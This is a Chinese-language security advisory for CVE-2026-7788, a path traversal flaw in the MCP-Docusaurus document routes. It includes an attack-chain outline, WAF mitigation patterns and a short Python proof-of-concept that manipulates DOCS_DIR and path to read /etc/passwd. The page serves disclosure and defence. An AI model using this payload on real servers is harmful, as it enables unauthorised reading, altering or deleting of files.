CVE-2026-7788 CVSS 7.3 高危

CVE-2026-7788 Axle-Bucamp MCP-Docusaurus路径遍历漏洞

披露日期: 2026-05-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7788

漏洞类型

路径遍历

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Axle-Bucamp MCP-Docusaurus

漏洞概述

Axle-Bucamp MCP-Docusaurus在处理文件操作时存在安全缺陷，涉及`app/routes/document.py`中的多个关键函数。攻击者可通过操纵`DOCS_DIR`或`path`参数发起路径遍历攻击。该漏洞无需身份认证且可远程利用，已有公开PoC。由于产品采用滚动发布模式，具体受影响版本需参考特定commit，建议用户尽快检查并更新。

技术细节

该漏洞源于Axle-Bucamp MCP-Docusaurus项目中`app/routes/document.py`文件的`update_document`、`continue_document`、`delete_document`及`get_content`函数未对用户输入进行充分的验证。程序直接使用用户提供的`DOCS_DIR`和`path`参数构造文件路径，未过滤目录遍历字符（如`../`）。攻击者无需用户交互即可远程发送特制请求，利用此缺陷访问预期目录之外的文件系统资源。这可能导致敏感信息泄露（机密性影响）、数据被篡改（完整性影响）或服务中断（可用性影响）。

攻击链分析

STEP 1

侦察

攻击者识别互联网上运行Axle-Bucamp MCP-Docusaurus的目标服务器。

STEP 2

武器化

攻击者构造包含目录遍历序列（如../）的恶意HTTP请求， targeting vulnerable endpoints like /document/update.

STEP 3

交付与利用

向目标服务器发送恶意请求，操纵DOCS_DIR/path参数以绕过目录限制。

STEP 4

达成目标

成功读取、修改或删除服务器上的敏感文件，造成数据泄露或破坏。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: Path Traversal in Axle-Bucamp MCP-Docusaurus
# Description: PoC for CVE-2026-7788 to demonstrate reading arbitrary files.

target_url = "http://target-host:port/document/get_content"

# Vulnerable parameters: DOCS_DIR and path
# Attempting to read /etc/passwd using path traversal
payload = {
    "DOCS_DIR": "../../..",
    "path": "etc/passwd"
}

try:
    response = requests.post(target_url, data=payload)
    if response.status_code == 200:
        print("[+] Exploit successful! Server response:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] An error occurred: {e}")

影响范围

Axle-Bucamp MCP-Docusaurus <= commit 404bc028e15ec304c9a045528560f4b5f27a17e0

防御指南

临时缓解措施

建议在WAF或网关层部署规则，拦截包含"../"或"..%5c"等路径遍历特征的请求。同时，限制应用服务器的出站和敏感文件访问权限，直至完成官方补丁更新。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7788
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7788
3 Details https://www.cvedetails.com/cve/CVE-2026-7788/
4 VulDB https://vuldb.com/cve/CVE-2026-7788
5 Link https://github.com/Axle-Bucamp/MCP-Docusaurus/
6 Link https://github.com/Axle-Bucamp/MCP-Docusaurus/issues/2
7 Link https://vuldb.com/submit/807746
8 Link https://vuldb.com/vuln/360994
9 Link https://vuldb.com/vuln/360994/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表